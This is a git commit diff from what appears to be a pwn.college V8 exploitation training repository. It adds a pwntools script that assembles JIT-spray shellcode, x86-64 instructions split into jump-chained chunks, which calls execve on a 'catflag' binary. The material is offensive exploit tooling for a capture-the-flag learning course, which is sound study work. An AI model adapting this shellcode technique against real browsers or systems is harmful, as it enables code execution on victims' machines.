Moved JavaScript/PwnCollegeV8Exploitation/ to PwnCollege/V8Exploitation/

2024-09-27 10:32:08 +08:00
parent ed5918f284
commit 41c959a465
52 changed files with 1 additions and 0 deletions
--- a/PwnCollege/V8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py
+++ b/PwnCollege/V8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py
@@ -0,0 +1,46 @@
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+# execve("catflag", NULL, NULL)
+
+assembly = f"""
+/* Craft envp to rdx */
+xor     rdx, rdx            /* 3 */
+/* Craft argv to rsi */
+xor     rsi, rsi            /* 3 */
+jmp     (. + 0x2) + 0xc     /* 2 */
+/* Craft pathname to rdi */
+mov     eax, 0x0067616c     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+shl     rax, 32             /* 4 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     ebx, 0x66746163     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+or      rax, rbx            /* 3 */
+push    rax                 /* 1 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     rdi, rsp            /* 3 */
+nop
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+/* syscall execve */
+{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}         /* 5 */
+int3                        /* 1 */
+int3                        /* 1 */
+int3                        /* 1 */
+""".strip()
+
+dump_machine_code(assembly)